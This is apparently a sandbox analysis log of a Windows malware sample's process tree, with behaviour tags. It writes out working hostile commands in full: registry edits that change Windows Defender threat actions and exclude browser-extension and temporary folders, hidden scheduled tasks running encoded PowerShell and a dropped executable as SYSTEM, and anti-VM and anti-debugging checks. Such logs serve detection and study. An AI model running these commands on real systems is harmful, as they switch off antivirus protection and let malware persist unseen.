C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:64
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:668
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:4588 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:3164 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:992
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
PID:2668 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:3556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:2692
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:832 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4128
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4000
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKRdpmURQpaU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKRdpmURQpaU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZTBxIWbqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZTBxIWbqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aMBHFSbSyrUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aMBHFSbSyrUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\smKXxMfqpieUC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\smKXxMfqpieUC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyxcWyOuWaibjkVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyxcWyOuWaibjkVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AkGJDxGRiCChDkCg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AkGJDxGRiCChDkCg\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:3500
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:643⤵PID:3540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZTBxIWbqU" /t REG_DWORD /d 0 /reg:323⤵PID:3460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZTBxIWbqU" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aMBHFSbSyrUn" /t REG_DWORD /d 0 /reg:323⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aMBHFSbSyrUn" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\smKXxMfqpieUC" /t REG_DWORD /d 0 /reg:323⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\smKXxMfqpieUC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyxcWyOuWaibjkVB /t REG_DWORD /d 0 /reg:323⤵PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyxcWyOuWaibjkVB /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP /t REG_DWORD /d 0 /reg:323⤵PID:5068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AkGJDxGRiCChDkCg /t REG_DWORD /d 0 /reg:323⤵PID:3800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AkGJDxGRiCChDkCg /t REG_DWORD /d 0 /reg:643⤵PID:3948
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goUtmlAba" /SC once /ST 04:50:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3352 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1152
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goUtmlAba"2⤵
- System Location Discovery: System Language Discovery
PID:2516 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5004
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goUtmlAba"2⤵
- System Location Discovery: System Language Discovery
PID:4576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "voUEtHYOOZwJsxqeG" /SC once /ST 04:50:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\bgsBSgx.exe\" 9m /WJpididjc 385104 /S" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "voUEtHYOOZwJsxqeG"2⤵
- System Location Discovery: System Language Discovery
PID:2780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 8162⤵
- Program crash
PID:4280
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4124
-
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe1⤵
- Executes dropped EXE
PID:1084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:64
-
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5052
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3684
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2348
-
C:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\bgsBSgx.exeC:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\bgsBSgx.exe 9m /WJpididjc 385104 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
